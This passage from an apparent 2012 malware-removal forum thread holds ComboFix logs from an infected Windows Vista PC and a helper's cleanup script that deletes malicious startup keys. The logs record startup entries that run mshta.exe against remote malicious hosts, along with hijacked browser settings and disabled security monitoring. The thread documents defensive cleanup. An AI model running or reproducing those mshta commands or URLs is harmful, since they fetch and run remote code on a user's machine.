[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSv c]
@="Service"
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Metacafe.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
backup=c:\windows\pss\Metacafe.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk
backup=c:\windows\pss\Microsoft Office.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^Users^GAGAN^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk]
path=c:\users\GAGAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
backup=c:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
mshta.exe http://mistymodel.info/set_inf2.php?...u6qNCcCsJqkMCP [?]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
mshta.exe http://mistymodel.info/reg2.php?ccci...CsJqkMCP&log=1 [?]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HWSetup]
\HWSetup.exe hwSetUP [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\webvsint]
mshta [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Akamai NetSession Interface]
2011-12-13 04:20 3305760 ----a-w- c:\users\GAGAN\AppData\Local\Akamai\netsession_win.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
2012-02-21 01:28 59240 ----a-w- c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Camera Assistant Software]
2007-04-10 23:40 413696 ----a-w- c:\program files\Camera Assistant Software for Toshiba\traybar.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtamon]
2010-02-10 12:39 16040 ----a-w- c:\program files\Dell V305\dldtamon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtmon.exe]
2010-02-10 12:39 672424 ----a-w- c:\program files\Dell V305\dldtmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\EPSON WorkForce 30 Series]
2007-11-26 21:00 188928 ----a-w- c:\windows\System32\spool\drivers\w32x86\3\E_FATIEEA.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\googletalk]
2007-01-01 21:22 3739648 ----a-w- c:\users\GAGAN\AppData\Roaming\Google\Google Talk\googletalk.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HSON]
2006-12-07 23:49 55416 ----a-w- c:\program files\Toshiba\TBS\HSON.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2012-03-27 09:09 421736 ----a-w- c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KeNotify]
2006-11-07 00:14 34352 ----a-w- c:\program files\Toshiba\Utilities\KeNotify.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NBAgent]
2009-06-18 07:08 1062184 ----a-w- c:\program files\Nero\Nero BackItUp & Burn\Nero BackItUp\NBAgent.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Pando Media Booster]
2009-02-27 06:22 2785608 ----a-w- c:\program files\Pando Networks\Media Booster\PMB.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2011-10-24 19:28 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RtHDVCpl]
2007-06-13 17:11 4489216 ----a-w- c:\windows\RtHDVCpl.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skytel]
2007-05-29 00:39 1826816 ----a-w- c:\windows\SkyTel.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SmoothView]
2007-03-22 18:46 448632 ----a-w- c:\program files\Toshiba\SmoothView\SmoothView.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Speech Recognition]
2008-01-19 07:33 49664 ----a-w- c:\windows\Speech\Common\sapisvr.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
2006-11-10 16:35 90112 ----a-w- c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SVPWUTIL]
2006-03-23 04:42 438272 ----a-w- c:\program files\Toshiba\Utilities\SVPWUTIL.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
2009-03-20 11:36 1451304 ----a-w- c:\program files\Synaptics\SynTP\SynTPEnh.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPwrMain]
2007-03-29 17:39 411192 ----a-w- c:\program files\Toshiba\Power Saver\TPwrMain.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VeohPlugin]
2011-06-30 10:11 2648184 ----a-w- c:\program files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring"=dword:00000001
.
R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-05 257696]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceAndNoImpersonation REG_MULTI_SZ FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2012-05-28 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-07 06:08]
.
2012-05-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000Core.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2012-05-29 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000UA.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2011-01-29 c:\windows\Tasks\User_Feed_Synchronization-{EA4C49AC-05D5-4334-B956-853DDFB08609}.job
- c:\windows\system32\msfeedssync.exe [2012-04-12 08:09]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://search.imesh.com/
mStart Page = hxxp://home.sweetim.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local
LSP: c:\windows\system32\wpclsp.dll
TCP: DhcpNameServer = 192.168.1.1
FF - ProfilePath - c:\users\GAGAN\AppData\Roaming\Mozilla\Firefox\Profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
.
- - - - ORPHANS REMOVED - - - -
.
WebBrowser-{EEE6C35B-6118-11DC-9C72-001320C79847} - (no file)
WebBrowser-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
MSConfigStartUp-BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA} - c:\program files\Common Files\Nero\Lib\NMBgMonitor.exe
MSConfigStartUp-CTFMon - c:\windows\system32\CTF\ctfmon.exe
MSConfigStartUp-fcconf - c:\users\GAGAN\AppData\Local\Temp\dns-hone.dll
MSConfigStartUp-InCD - c:\program files\Nero\Nero8\InCD\InCD.exe
MSConfigStartUp-NDSTray - NDSTray.exe
MSConfigStartUp-NeroFilterCheck - c:\program files\Common Files\Nero\Lib\NeroCheck.exe
MSConfigStartUp-SecurDisc - c:\program files\Nero\Nero8\InCD\NBHGui.exe
MSConfigStartUp-SiteAdvisor - c:\program files\SiteAdvisor\6172\SiteAdv.exe
MSConfigStartUp-Swusukukasega - c:\users\GAGAN\AppData\Local\ocopodatodejex.dll
MSConfigStartUp-TkBellExe - c:\program files\Common Files\Real\Update_OB\realsched.exe
MSConfigStartUp-YSearchProtection - c:\program files\Yahoo!\Search Protection\SearchProtection.exe
AddRemove-Akamai - c:\program files\common files\akamai\uninstall.exe
AddRemove-WinImage - c:\users\GAGAN\Desktop\winima81\winimage.exe
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2012-05-28 22:49
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.aif\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.aifc\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.aiff\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.au\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.flac\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.m3u\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.mid\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.midi\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.mp3\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.ogg\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.pcm\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.pls\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.snd\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.spx\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.wav\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.wma\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow]
@Denied: (Read) (RestrictedCode)
@Denied: (Read) (LocalSystem)
@Denied: (Read) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Read) (Administrators)
@SACL=(02 0001)
@Ace=(0x11) (1) (S-1-16-4096)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Aurigma]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Conduit]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Unity]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\uTorrentControl]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\bookmarks]
@SACL=(02 0001)
"lastact"=dword:00003640
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\ButtonHis tory]
@SACL=(02 0001)
"srch_ebox"=dword:4785b178
"srch_hlt"=dword:47854ece
"clkstrm"=dword:4785b2dc
"boo"=dword:4785b2dc
"etpg70_21"=dword:47854ece
"sst"=dword:47854ecf
"mess"=dword:4785b2dc
"mess_off"=dword:4785b2dc
"yma"=dword:47854eda
"mus"=dword:47854edb
"wik"=dword:47854edb
"vis_srch70"=dword:4785abea
"cacheldr"=dword:4785b2dc
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\URLHistor y]
@SACL=(02 0001)
"srch"=dword:4785abec
"vis_srch70"=dword:4785abec
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\simi_zenith05]
@SACL=(02 0001)
"LastPoll_200"=dword:00041537
"resfeed"=dword:00000002
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\SearchHistory]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\CDDB]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies\exe4j]
"InstallStarted"=dword:00000000
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui 3.0]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"UninstallString"="c:\\Windows\\system32\\javaws.exe -uninstall -prompt \"http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp\""
"DisplayName"="jlGui 3.0"
"DisplayIcon"="c:\\Users\\GAGAN\\AppData\\LocalLow\\Sun\\Java\\Deployment\\ cache\\6.0\\57\\573addb9-2492e35c.ico"
"NoModify"=dword:00000001
"NoRepair"=dword:00000001
"Publisher"="Music Player for the Java(tm) Platform"
"Comments"="jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ..."
"URLInfoAbout"="http://www.javazoom.net"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Webcheck\Store.1]
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\System\12a9d3cc-cd48-4c6b-a102-8b76a6f66e5a]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"bgu0fw0tDZx8jtqEjccbDg==
"=hex:45,75,92,1a,9f,09,c9,e9,d6,46,18,dd,5c,30,38,
96
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta]
@Denied: (Full) (Administrators)
@Denied: (Full) (Owner)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (Administrators)
@Denied: (Full) (Users)
@SACL=
"PerceivedType"="text"
@="htafile"
"Content Type"="application/hta"
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta\PersistentHandler]
@="{eec97550-47a9-11cf-b952-00aa0051fe20}"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
Completion time: 2012-05-28 22:55:51
ComboFix-quarantined-files.txt 2012-05-29 02:55
.
Pre-Run: 28,398,157,824 bytes free
Post-Run: 28,481,286,144 bytes free
.
- - End Of File - - 81C424733602C9A0DE9C0999B8DD65AF
gagraptor's Avatar
gagraptor gagraptor is offline
Computer Specs
Member with 31 posts.
THREAD STARTER
 
Join Date: May 2012
Experience: Beginner
28-May-2012, 11:04 PM #10
torrents not in use
gagraptor's Avatar
gagraptor gagraptor is offline
Computer Specs
Member with 31 posts.
THREAD STARTER
 
Join Date: May 2012
Experience: Beginner
28-May-2012, 11:18 PM #11
the problem seems partially solved. now i have blank windows popping up. it has a web address in the top. Http://silentmode.net/reg2php?cccid=...u6qncccsjqkmcp
gagraptor's Avatar
gagraptor gagraptor is offline
Computer Specs
Member with 31 posts.
THREAD STARTER
 
Join Date: May 2012
Experience: Beginner
28-May-2012, 11:29 PM #12
i guess its not its back again
Mark1956's Avatar
Malware Removal Specialist with 14,074 posts.
 
Join Date: May 2011
Location: Spain
Experience: Advanced
29-May-2012, 11:10 AM #13
No surprise with that, I was not sure if Combofix would clear the problem but it has given more information to work from, this fix should clear it. There will be a few more things to do once the problem of the popups has gone so please stick with me until I say we are done.

We are now going to run ComboFix a different way.
Open Notepad by clicking on and in the Search box type: Notepad.exe and hit Enter.
Copy and paste everything in the code box below into it.
-- Note: Make sure Word Wrap is unchecked in Notepad by clicking on Format in the top menu.
Code:
Killall::
Registry::
[-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
[-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
[-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\webvsint]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"=-
"RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"=-
Reboot::
  • Save the file as CFScript.txt by choosing Save As... in the File Menu, and save it to your Desktop where the ComboFix icon is also located.
  • Close your browser and disconnect from the Internet.
  • Now use your mouse to drag, then drop the CFScript.txt file on top of ComboFix.exe as seen in the image below.
  • This will start ComboFix again and launch the script.
  • ComboFix may reboot your system when it finishes. This is normal.
  • A log will be created just as before and saved to C:\ComboFix.txt. Please copy and paste the contents of ComboFix.txt in your next reply.
  • Be sure to re-enable your anti-virus and other security programs after the scan is complete.
gagraptor's Avatar
gagraptor gagraptor is offline
Computer Specs
Member with 31 posts.
THREAD STARTER
 
Join Date: May 2012
Experience: Beginner
29-May-2012, 02:06 PM #14
ComboFix 12-05-29.01 - GAGAN 05/29/2012 23:51:22.3.2 - x86
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.927 [GMT -4:00]
Running from: c:\users\GAGAN\Desktop\ComboFix.exe
Command switches used :: c:\users\GAGAN\Desktop\CFScript.txt
AV: Microsoft Security Essentials *Disabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Microsoft Security Essentials *Disabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\windows\system32\drivers\etc\hosts.ics
.
.
((((((((((((((((((((((((( Files Created from 2012-04-28 to 2012-05-30 )))))))))))))))))))))))))))))))
.
.
2012-05-30 04:03 . 2012-05-30 04:05 -------- d-----w- c:\users\GAGAN\AppData\Local\temp
2012-05-30 04:03 . 2012-05-30 04:03 -------- d-----w- c:\users\Default\AppData\Local\temp
2012-05-30 03:44 . 2012-05-30 03:44 29904 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0D65DCBB-645F-4F85-8BC7-9E0E1CE17186}\MpKsl5ae50f1e.sys
2012-05-29 18:04 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0D65DCBB-645F-4F85-8BC7-9E0E1CE17186}\mpengine.dll
2012-05-29 03:00 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2012-05-22 05:16 . 2012-05-22 05:16 713784 ------w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{F78CEF23-EB95-4DED-8458-48E319614326}\gapaengine.dll
2012-05-22 05:09 . 2012-05-22 05:10 -------- d-----w- c:\program files\Microsoft Security Client
2012-05-19 05:43 . 2012-05-19 09:50 -------- d-----w- c:\programdata\vsint
2012-05-14 22:57 . 2012-03-20 23:28 53120 ----a-w- c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57 . 2012-03-30 12:39 914304 ----a-w- c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57 . 2012-03-29 13:39 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
2012-05-14 22:57 . 2012-02-01 15:10 1404928 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\InkObj.dll
2012-05-14 22:57 . 2012-02-01 15:10 936960 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\journal.dll
2012-05-14 22:57 . 2012-02-29 13:41 1069056 ----a-w- c:\windows\system32\DWrite.dll
2012-05-14 22:57 . 2012-03-01 14:46 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57 . 2012-02-29 14:08 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
2012-05-14 22:57 . 2012-03-01 14:46 160768 ----a-w- c:\windows\system32\d3d10_1.dll
2012-05-14 22:57 . 2012-02-29 13:44 683008 ----a-w- c:\windows\system32\d2d1.dll
2012-05-14 22:56 . 2012-04-03 08:16 3550080 ----a-w- c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56 . 2012-04-03 08:16 3602816 ----a-w- c:\windows\system32\ntkrnlpa.exe
2012-05-09 04:58 . 2012-05-09 04:58 592824 ----a-w- c:\program files\Mozilla Firefox\gkmedias.dll
2012-05-09 04:58 . 2012-05-09 04:58 44472 ----a-w- c:\program files\Mozilla Firefox\mozglue.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-05-08 16:40 . 2012-05-19 08:37 6737808 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{3070EC37-30CA-43AE-AC15-BBE0716A8AAD}\mpengine.dll
2012-05-05 06:08 . 2012-04-07 05:22 419488 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2012-05-05 06:08 . 2011-06-14 22:11 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2012-04-04 19:56 . 2010-02-20 07:40 22344 ----a-w- c:\windows\system32\drivers\mbam.sys
2012-04-02 13:36 . 2012-05-14 22:56 2044928 ----a-w- c:\windows\system32\win32k.sys
2012-03-21 00:44 . 2012-03-21 00:44 74112 ----a-w- c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44 . 2012-03-21 00:44 171064 ----a-w- c:\windows\system32\drivers\MpFilter.sys
2012-05-09 04:58 . 2011-06-08 03:45 97208 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{e9df9360-97f8-4690-afe6-996c80790da4}]
2011-05-09 08:49 176936 ----a-w- c:\program files\uTorrentControl\prxtbuTor.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{E9DF9360-97F8-4690-AFE6-996C80790DA4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="RtHDVCpl.exe" [2007-06-13 4489216]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2006-09-11 180224]
"Skytel"="Skytel.exe" [2007-05-29 1826816]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-10-15 39792]
"00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2007-04-27 538744]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-03-20 1451304]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2011-10-24 421888]
"TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2011-12-01 296056]
"DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-02-21 59240]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-03-27 421736]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"Picasa Media Detector"="c:\program files\Picasa2\PicasaMediaDetector.exe" [2007-10-23 443968]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\syste m]
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSv c]
@="Service"
.
